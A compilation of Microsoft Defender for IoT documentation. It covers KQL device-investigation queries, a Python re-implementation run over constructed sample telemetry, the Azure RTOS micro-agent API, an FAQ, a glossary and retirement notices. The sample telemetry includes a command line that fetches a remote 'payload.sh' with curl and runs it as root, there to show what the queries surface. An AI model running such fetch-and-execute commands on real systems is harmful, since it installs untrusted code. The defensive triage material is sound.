Published by suphakorn.it, 2023-08-02 02:09:29

azure-defender-for-iot-device-builders



Use this data to discover:
- Which users have access to the device?
- Do the users with access have the expected permission levels?

Open ports

To find out which ports in the device are currently in use or were used, use the following KQL query:

```kusto
let device = "YOUR_DEVICE_ID";
let hub = "YOUR_HUB_NAME";
SecurityIoTRawEvent
| where
    DeviceId == device
    and AssociatedResourceId contains tolower(hub)
    and RawEventName == "ListeningPorts"
    and extractjson("$.LocalPort", EventDetails, typeof(int)) <= 1024 // avoid short-lived TCP ports (Ephemeral)
| project
    TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)),
    Protocol=extractjson("$.Protocol", EventDetails, typeof(string)),
    LocalAddress=extractjson("$.LocalAddress", EventDetails, typeof(string)),
    LocalPort=extractjson("$.LocalPort", EventDetails, typeof(int)),
    RemoteAddress=extractjson("$.RemoteAddress", EventDetails, typeof(string)),
    RemotePort=extractjson("$.RemotePort", EventDetails, typeof(string))
| summarize
    MinObservedTime=min(TimestampLocal),
    MaxObservedTime=max(TimestampLocal),
    AllowedRemoteIPAddress=makeset(RemoteAddress),
    AllowedRemotePort=makeset(RemotePort)
    by Protocol, LocalPort
```

Note that the `<= 1024` filter hides services that listen on high ports as well as ephemeral client sockets; drop or widen it if your device runs such services.

Use this data to discover:
- Which listening sockets are currently active on the device?
- Should the listening sockets that are currently active be allowed?
- Are there any suspicious remote addresses connected to the device?

User logins

To find users that logged into the device, use the following KQL query:

```kusto
let device = "YOUR_DEVICE_ID";
let hub = "YOUR_HUB_NAME";
SecurityIoTRawEvent
| where
    DeviceId == device
    and AssociatedResourceId contains tolower(hub)
    and RawEventName == "Login"
    // filter out local, invalid and failed logins
    and EventDetails contains "RemoteAddress"
    and EventDetails !contains '"RemoteAddress":"127.0.0.1"'
    and EventDetails !contains '"UserName":"(invalid user)"'
    and EventDetails !contains '"UserName":"(unknown user)"'
    //and EventDetails !contains '"Result":"Fail"'
| project
    TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)),
    UserName=extractjson("$.UserName", EventDetails, typeof(string)),
    LoginHandler=extractjson("$.Executable", EventDetails, typeof(string)),
    RemoteAddress=extractjson("$.RemoteAddress", EventDetails, typeof(string)),
    Result=extractjson("$.Result", EventDetails, typeof(string))
| summarize
    CntLoginAttempts=count(),
    MinObservedTime=min(TimestampLocal),
    MaxObservedTime=max(TimestampLocal),
    CntIPAddress=dcount(RemoteAddress),
    IPAddress=makeset(RemoteAddress)
    by UserName, Result, LoginHandler
```

The last filter is left commented out so that failed attempts stay in the results: a high CntLoginAttempts with Result "Fail" from one or a few remote addresses is what a password-guessing attempt looks like in this table.

Use the query results to discover:
- Which users signed in to the device?
- Are the users that signed in supposed to sign in?
- Did the users that signed in connect from expected or unexpected IP addresses?

Process list

To find out if the process list is as expected, use the following KQL query:

```kusto
let device = "YOUR_DEVICE_ID";
let hub = "YOUR_HUB_NAME";
SecurityIoTRawEvent
| where
    DeviceId == device
    and AssociatedResourceId contains tolower(hub)
    and RawEventName == "ProcessCreate"
| project
    TimestampLocal=extractjson("$.TimestampLocal", EventDetails, typeof(datetime)),
    Executable=extractjson("$.Executable", EventDetails, typeof(string)),
    UserId=extractjson("$.UserId", EventDetails, typeof(string)),
    CommandLine=extractjson("$.CommandLine", EventDetails, typeof(string))
| join kind=leftouter (
    // user UserId details
    SecurityIoTRawEvent
    | where
        DeviceId == device
        and AssociatedResourceId contains tolower(hub)
        and RawEventName == "LocalUsers"
    | project
        UserId=extractjson("$.UserId", EventDetails, typeof(string)),
        UserName=extractjson("$.UserName", EventDetails, typeof(string))
    | distinct UserId, UserName
    ) on UserId
| extend UserIdName = strcat("Id:", UserId, ", Name:", UserName)
| summarize
    CntExecutions=count(),
    MinObservedTime=min(TimestampLocal),
    MaxObservedTime=max(TimestampLocal),
    ExecutingUsers=makeset(UserIdName),
    ExecutionCommandLines=makeset(CommandLine)
    by Executable
```

The join is `leftouter` on purpose: a process whose UserId has no matching LocalUsers row (for example a UID the agent never reported, or one created after the user list was collected) is kept in the results with an empty name rather than silently dropped.

Use the query results to discover:
- Were there any suspicious processes running on the device?
- Were processes executed by appropriate users?
- Did any command-line executions contain the correct and expected arguments?

Next steps

After investigating a device and gaining a better understanding of your risks, you may want to consider configuring custom alerts to improve your IoT solution security posture. If you don't already have a device agent, consider deploying a security agent or changing the configuration of an existing device agent to improve your results.
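The three investigation queries above depend on one data shape: every SecurityIoTRawEvent row carries its payload as a JSON string in EventDetails, and the queries extract fields from it, filter, and summarize. The following Python is an added example, not part of the original article or of Defender for IoT, that re-implements the open-ports, user-logins and process-list summaries over a handful of constructed rows, so the filtering rules (privileged ports only, drop loopback and invalid-user logins, keep processes whose UserId has no LocalUsers row) can be exercised offline. The device ID, hub name, resource ID format, timestamps, addresses and usernames are all made up for the example.

```python
"""Offline re-implementation of the open-ports, user-logins and process-list
triage queries over constructed SecurityIoTRawEvent-shaped rows (added example,
not Defender for IoT code). EventDetails is a JSON string, as in the real table."""
import json
from collections import defaultdict

DEVICE = "YOUR_DEVICE_ID"   # placeholders mirror the KQL `let` bindings
HUB = "example-hub"         # matched lowercase inside AssociatedResourceId, as in the KQL


def raw_event(name, **details):
    """Build one row; the resource ID format is an assumption for the example."""
    return {"DeviceId": DEVICE,
            "AssociatedResourceId": f"/subscriptions/0/providers/microsoft.devices/iothubs/{HUB}",
            "RawEventName": name,
            "EventDetails": json.dumps(details)}


# Constructed sample telemetry for one device (not real data).
EVENTS = [
    raw_event("ListeningPorts", TimestampLocal="2023-01-10T08:00:00Z", Protocol="tcp",
              LocalAddress="0.0.0.0", LocalPort=22, RemoteAddress="10.0.0.5", RemotePort="51022"),
    raw_event("ListeningPorts", TimestampLocal="2023-01-10T09:00:00Z", Protocol="tcp",
              LocalAddress="0.0.0.0", LocalPort=22, RemoteAddress="203.0.113.9", RemotePort="40010"),
    raw_event("ListeningPorts", TimestampLocal="2023-01-10T09:05:00Z", Protocol="tcp",
              LocalAddress="127.0.0.1", LocalPort=41234, RemoteAddress="", RemotePort=""),  # ephemeral
    raw_event("Login", TimestampLocal="2023-01-10T08:01:00Z", UserName="pi", Executable="sshd",
              RemoteAddress="10.0.0.5", Result="Success"),
    raw_event("Login", TimestampLocal="2023-01-10T09:01:00Z", UserName="pi", Executable="sshd",
              RemoteAddress="203.0.113.9", Result="Fail"),
    raw_event("Login", TimestampLocal="2023-01-10T09:02:00Z", UserName="(invalid user)",
              Executable="sshd", RemoteAddress="203.0.113.9", Result="Fail"),   # filtered out
    raw_event("Login", TimestampLocal="2023-01-10T09:03:00Z", UserName="root", Executable="login",
              RemoteAddress="127.0.0.1", Result="Success"),                      # local, filtered out
    raw_event("LocalUsers", UserId="1000", UserName="pi", GroupName="pi"),
    raw_event("ProcessCreate", TimestampLocal="2023-01-10T08:02:00Z", Executable="/usr/bin/curl",
              UserId="1000", CommandLine="curl http://203.0.113.9/payload.sh"),
    raw_event("ProcessCreate", TimestampLocal="2023-01-10T08:03:00Z", Executable="/bin/sh",
              UserId="0", CommandLine="sh payload.sh"),   # UID 0 has no LocalUsers row
]


def device_events(events, name):
    """The shared `where` clause: one device, one hub, one RawEventName; parses EventDetails."""
    for e in events:
        if (e["DeviceId"] == DEVICE and HUB.lower() in e["AssociatedResourceId"]
                and e["RawEventName"] == name):
            yield json.loads(e["EventDetails"])


def open_ports(events):
    """ListeningPorts on privileged ports (<= 1024), summarized by (Protocol, LocalPort)."""
    out = defaultdict(lambda: {"MinObservedTime": None, "MaxObservedTime": None,
                               "AllowedRemoteIPAddress": set(), "AllowedRemotePort": set()})
    for d in device_events(events, "ListeningPorts"):
        if d["LocalPort"] > 1024:          # same cut as the KQL comment: skip ephemeral ports
            continue
        row = out[(d["Protocol"], d["LocalPort"])]
        ts = d["TimestampLocal"]           # ISO-8601 strings order correctly as text
        row["MinObservedTime"] = min(t for t in (row["MinObservedTime"], ts) if t)
        row["MaxObservedTime"] = max(t for t in (row["MaxObservedTime"], ts) if t)
        row["AllowedRemoteIPAddress"].add(d["RemoteAddress"])
        row["AllowedRemotePort"].add(d["RemotePort"])
    return dict(out)


def user_logins(events, include_failed=True):
    """Remote logins by (UserName, Result, LoginHandler) with distinct source IPs.
    include_failed=False applies the filter the KQL leaves commented out."""
    out = defaultdict(lambda: {"CntLoginAttempts": 0, "IPAddress": set()})
    for d in device_events(events, "Login"):
        if "RemoteAddress" not in d or d["RemoteAddress"] == "127.0.0.1":
            continue                       # local logins are not interesting here
        if d["UserName"] in ("(invalid user)", "(unknown user)"):
            continue                       # sshd placeholders for nonexistent accounts
        if not include_failed and d["Result"] == "Fail":
            continue
        row = out[(d["UserName"], d["Result"], d["Executable"])]
        row["CntLoginAttempts"] += 1
        row["IPAddress"].add(d["RemoteAddress"])
    for row in out.values():
        row["CntIPAddress"] = len(row["IPAddress"])   # dcount(RemoteAddress)
    return dict(out)


def process_list(events):
    """ProcessCreate left-joined to LocalUsers on UserId, summarized by Executable."""
    names = {d["UserId"]: d["UserName"] for d in device_events(events, "LocalUsers")}
    out = defaultdict(lambda: {"CntExecutions": 0, "ExecutingUsers": set(),
                               "ExecutionCommandLines": set()})
    for d in device_events(events, "ProcessCreate"):
        row = out[d["Executable"]]
        row["CntExecutions"] += 1
        # leftouter semantics: an unmatched UserId keeps the row with an empty Name
        row["ExecutingUsers"].add(f"Id:{d['UserId']}, Name:{names.get(d['UserId'], '')}")
        row["ExecutionCommandLines"].add(d["CommandLine"])
    return dict(out)


if __name__ == "__main__":
    for title, result in (("Open ports", open_ports(EVENTS)),
                          ("User logins", user_logins(EVENTS)),
                          ("Process list", process_list(EVENTS))):
        print(title)
        for key, row in result.items():
            print("  ", key, {k: sorted(v) if isinstance(v, set) else v for k, v in row.items()})
```

Running it shows the questions the article asks answered on the sample data: port 22 was reached from both an internal and an external address, the failed login from 203.0.113.9 survives because the failure filter is commented out, and `/bin/sh` run as UID 0 appears with an empty name because no LocalUsers row describes that account.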


Defender-IoT-micro-agent for Azure RTOS API (preview)
Article • 03/28/2022

Defender for IoT APIs are governed by Microsoft API License and Terms of use.

This API is intended for use with the Defender-IoT-micro-agent for Azure RTOS only. For additional resources, see the Defender-IoT-micro-agent for Azure RTOS GitHub resource.

Enable Defender-IoT-micro-agent for Azure RTOS

Prototype

```c
UINT nx_azure_iot_security_module_enable(NX_AZURE_IOT *nx_azure_iot_ptr);
```

Description

This routine enables the Azure IoT Defender-IoT-micro-agent subsystem. An internal state machine manages collection of security events and sends them to Azure IoT Hub. Only one NX_AZURE_IOT_SECURITY_MODULE instance is required and needed to manage data collection.

Parameters

Name | Description
nx_azure_iot_ptr [in] | A pointer to a NX_AZURE_IOT.

Return values

Return value | Description
NX_AZURE_IOT_SUCCESS | Successfully enabled Azure IoT Security Module.
NX_AZURE_IOT_FAILURE | Failed to enable the Azure IoT Security Module due to an internal error.
NX_AZURE_IOT_INVALID_PARAMETER | Security module requires a valid NX_AZURE_IOT instance.

Allowed from

Threads

Disable Azure IoT Defender-IoT-micro-agent

Prototype

```c
UINT nx_azure_iot_security_module_disable(NX_AZURE_IOT *nx_azure_iot_ptr);
```

Description

This routine disables the Azure IoT Defender-IoT-micro-agent subsystem.

Parameters

Name | Description
nx_azure_iot_ptr [in] | A pointer to NX_AZURE_IOT. If NULL, the singleton instance is disabled.

Return values

Return value | Description
NX_AZURE_IOT_SUCCESS | Successful when the Azure IoT Security Module is successfully disabled.
NX_AZURE_IOT_INVALID_PARAMETER | Azure IoT Hub instance is different than the singleton composite instance.
NX_AZURE_IOT_FAILURE | Failed to disable the Azure IoT Security Module due to an internal error.

Allowed from

Threads

Next steps

To learn more about how to get started with the Azure RTOS Defender-IoT-micro-agent, see the following articles: Review the Defender for IoT RTOS Defender-IoT-micro-agent overview.


Microsoft Defender for IoT for device builders frequently asked questions
Article • 01/10/2023

This article provides a list of frequently asked questions and answers about the Defender for IoT agent.

Do I have to install an embedded security agent?

Agent installation on your IoT devices isn't mandatory in order to enable Defender for IoT. You can choose between the following two options, which provide different levels of security monitoring and management capabilities:
- Install the Defender for IoT embedded security agent with or without modifications. This option provides the highest level of enhanced security insights into device behavior and access.
- No security agent installation on your IoT devices. This option enables IoT Hub communication monitoring, with reduced security monitoring and management capabilities.

What does the Defender for IoT agent do?

The Defender for IoT agent provides device-level threat coverage for device configuration, behavior, and access (by scanning the configuration), process, and connectivity. The Defender for IoT security agent does not scan business-related data or activity.

What are the dependencies and prerequisites of the agent?

The Defender for IoT security agent is open source and available on GitHub in 32-bit and 64-bit Windows and Linux versions: https://github.com/Azure/Azure-IoT-Security. Defender for IoT supports a wide variety of platforms. See Supported Device platforms to verify support for your specific devices.

Which data is collected by the agent?

Connectivity, access, firewall configuration, process list, and OS baseline are collected by the agent.

How much data will the agent generate?

Agent data generation is driven by device, application, connectivity type, and customer agent configuration. Due to the high variability between devices and IoT solutions, we recommend first deploying the agent in a lab or test setting to observe, learn, and set the specific configuration that fits your needs, while measuring the amount of generated data. After starting the service, the Defender for IoT agent provides operational recommendations for optimizing agent throughput to help you with the configuration and customization process.

Do agent messages use up quota from IoT Hub?

Yes. Agent-transmitted data is counted in your IoT Hub quota.

I've installed an agent and don't see any activities or logs. What next?

1. Check that the agent type fits the designated OS platform of your device.
2. Confirm the agent is running on the device.
3. Check that the service was enabled successfully for Security in your IoT Hub.
4. Check that the device is configured in IoT Hub with the Defender for IoT module.

If the activities or logs are still unavailable, contact your Defender for IoT partner for additional help.

What happens when the internet connection stops working?

The sensors and agents continue to run and store data as long as the device is running. Data is stored in the security message cache according to the size configuration. When the device regains connectivity, security messages resume sending.

Can the agent affect the performance of the device or other installed software?

The agent consumes machine resources like any other application or process and should not disrupt normal device activity. Resource consumption on the device the agent runs on is coupled with its setup and configuration. We recommend testing your agent configuration in a contained environment, along with interoperability with your other IoT applications and functionality, before attempting to deploy in a production environment.

I'm doing maintenance on the device. Can I turn off the agent?

The agent cannot be turned off.

Is there a way to test if the agent is working correctly?

If the agent stops communicating or fails to send security messages, a Device is silent alert is generated.

Can I create my own alerts?

Yes, you can create custom alerts based on multiple parameters including IP/MAC address, protocol type, class, service, function, command, and so on, as well as values of custom tags contained in the payloads. See Create custom alerts to learn more about custom alerts and how to create them.

Next steps

To learn more about how to get started with Defender for IoT, see the following articles:
- Read the Defender for IoT overview
- Understand Defender for IoT security alerts


Defender for IoT glossary for device builder
Article • 01/10/2023

This glossary provides a brief description of important terms and concepts for the Microsoft Defender for IoT platform. Select the Learn more links to go to related terms in the glossary. This will help you to learn and use the product tools quickly and effectively.

D

Term | Description | Learn more
Device twins | Device twins are JSON documents that store device state information including metadata, configurations, and conditions. | Module twin
Defender-IoT-micro-agent twin (DB) | The Defender-IoT-micro-agent twin holds all of the information that is relevant to device security, for each specific device in your solution. | Device twin, Module twin
Device inventory | Defender for IoT identifies and classifies devices as a single unique network device in the inventory for: standalone IT, OT, and IoT devices with one or multiple NICs; devices composed of multiple backplane components, including all racks, slots, and modules; and devices that act as network infrastructure, for example switches and routers with multiple NICs. Public internet IP addresses, multicast groups, and broadcast groups aren't considered inventory devices. Devices that have been inactive for more than 60 days are classified as inactive inventory devices. |

I

Term | Description | Learn more
IoT Hub | Managed service, hosted in the cloud, that acts as a central message hub for bidirectional communication between your IoT application and the devices it manages. |

M

Term | Description | Learn more
Micro Agent | Provides depth security capabilities for IoT devices including security posture and threat detection. |
Module twin | Module twins are JSON documents that store module state information including metadata, configurations, and conditions. | Device twins, Defender-IoT-micro-agent twin


Feature support and retirement
Article • 01/10/2023

This article describes Microsoft Defender for IoT features and support for different capabilities within Defender for IoT.

Legacy Defender for IoT micro-agent

The Defender-IoT-micro-agent has been replaced by our newer micro-agent experience. For more information, see Tutorial: Create a DefenderIotMicroAgent module twin (Preview) and Tutorial: Install the Defender for IoT micro agent (Preview).

Timeline

Microsoft Defender for IoT will continue to support the legacy Microsoft Defender for IoT experience under IoT Hub until March 31, 2023.

Defender for IoT C, C#, and Edge Defender-IoT-micro-agent deprecation

The new micro agent will replace the current C, C#, and Edge Defender-IoT-micro-agent. The new micro agent development is based on the knowledge and experience gathered from the legacy security module development, customers, and feedback from partners, with four important improvements:
- Depth security value: The new agent will run on the host level, which will provide more visibility into the underlying operations of the device and allow for better security coverage.
- Improved device performance and reduced footprint: Achieved by a small RAM and ROM memory footprint as well as low CPU consumption.
- Plug and play: The new micro agent has no kernel-level dependencies anymore, and all of its software dependencies are provided as part of its package. The micro agent supports common CPU architectures.
- Easy to deploy: The micro agent supports different distribution models, through source code and as a binary package.

Timeline

Defender for IoT will continue to support C, C#, and Edge until March 1, 2022.

Micro agent preview support

During the preview the micro agent may experience breaking changes without notice.

Next steps

Check out Microsoft Defender for IoT agent frequently asked questions.


Azure security documentation

Azure offers security advantages that support your compliance efforts, provide cost-effective security for your organization, and help protect your hybrid and multicloud platforms, applications, and data.

- WHAT'S NEW: Learn about the Microsoft Entra family of multicloud identity and access solutions
- CONCEPT: Build a Zero Trust Foundation
- CONCEPT: Back up and restore plan to protect against ransomware
- CONCEPT: Protect your multicloud environment with unified security management and…
- HOW-TO GUIDE: Understand security coverage by the MITRE ATT&CK framework
- OVERVIEW: Combine SIEM and XDR to defend against modern attacks
- WHAT'S NEW: Sunset for SHA-1 Online Certificate Standard Protocol signing
- CONCEPT: Use watchlists in Microsoft Sentinel

Modernize security operations
- Introduction to Azure security
- Shared responsibilities for cloud computing

Data security & governance, risk, and compliance
- Introduction to information protection and governance in Microsoft 365
- Azure Policy service
- Protect against ransomware
- Deploy an information protection solution with Microsoft Purview

Secure identities and access
- Securing identity with Zero Trust
- Securing privileged access
- Building apps with a Zero Trust approach to identity

Security guidance for each phase of your cloud migration journey

Strategy and planning: Define business justification and expected outcomes of adoption
- Define a security strategy
- Envision a security end state
- Develop a cloud adoption plan

Implementation and operation: Migrate and modernize security operations management
- Application migration, modernization, and innovation
- Cloud management for operations team and architects
- Unlock new technical skills and expand capabilities

Cloud architecture: Design, build, and continuously improve your cloud architecture
- Security architecture design
- Security pillar of your architecture
- Microsoft Cybersecurity Reference Architectures

Continued learning: Discover learning paths that help you improve your security in the cloud
- Information protection and governance in Microsoft 365
- Secure your cloud applications in Azure
- Implement perimeter security

Additional security guidance
- Microsoft Learn training: If you're new to security, build your skills with Microsoft Learn training
- Microsoft Cloud Adoption Framework for Azure: Secure methodology designed to help cloud architects and business decision makers create and implement securit…
- Azure security fundamentals: For every phase of your cloud journey, learn how to secure your cloud solutions on Azure
- Azure Security Benchmark: Best practices and recommendations to secure your cloud deployments
- Azure Well-Architected Framework: Design principles for a securely architected system hosted on cloud or on-premises datacenters
- Azure Architecture Center: A set of guiding tenets that can be used to protect your applications and data from threats
- Microsoft Security Best Practices: Collection of best practices that provide clear actionable guidance for security related decisions, includes Azure and…
- Secure development: Learn how to develop and deploy secure applications on Azure with our sample apps, best practices, and guidance

Security services and capabilities
- Microsoft Sentinel: See and stop threats before they cause harm. Overview; Onboard Microsoft Sentinel; Learn: Cloud-native security operations with Microsoft Sentinel
- Microsoft Defender for Cloud: Unify security management and advanced threat protection across hybrid cloud workloads. Overview; Protect your resources; Learn: Secure your cloud apps and services
- Microsoft Defender for Identity: Improve security of hybrid environments from cyber attacks and insider threats. Overview; Deploy Microsoft Defender for Identity with Microsoft 365 Defender; Learn: Defend against attacks
- Azure key management: Key management solutions in Azure. Key management in Azure; Choosing a key management solution; Azure Key Vault; Azure Managed HSM; Azure Dedicated HSM; Azure Payment-HSM
- Microsoft Defender for Cloud Apps: Cloud Access Security Broker (CASB) that operates on multiple clouds. Overview; Get started; Detect and manage suspicious activity
- Microsoft Defender for IoT: Threat detection for IoT/OT environments. Overview; Get started with Defender for IoT; Learn: Enhance IoT solution security
- Azure Information Protection: Control and secure emails, documents, and sensitive data. Overview; Deploying the client; Discovering your sensitive content
- Azure Active Directory: Multi-tenant, cloud-based identity and access management service. Overview; Security operations guide; Learn: Secure Azure Active Directory users with Multi-Factor Authentication
- Microsoft 365 Defender: Security solutions that protect your enterprise across attack surfaces. Overview; Get started; Security operations guide

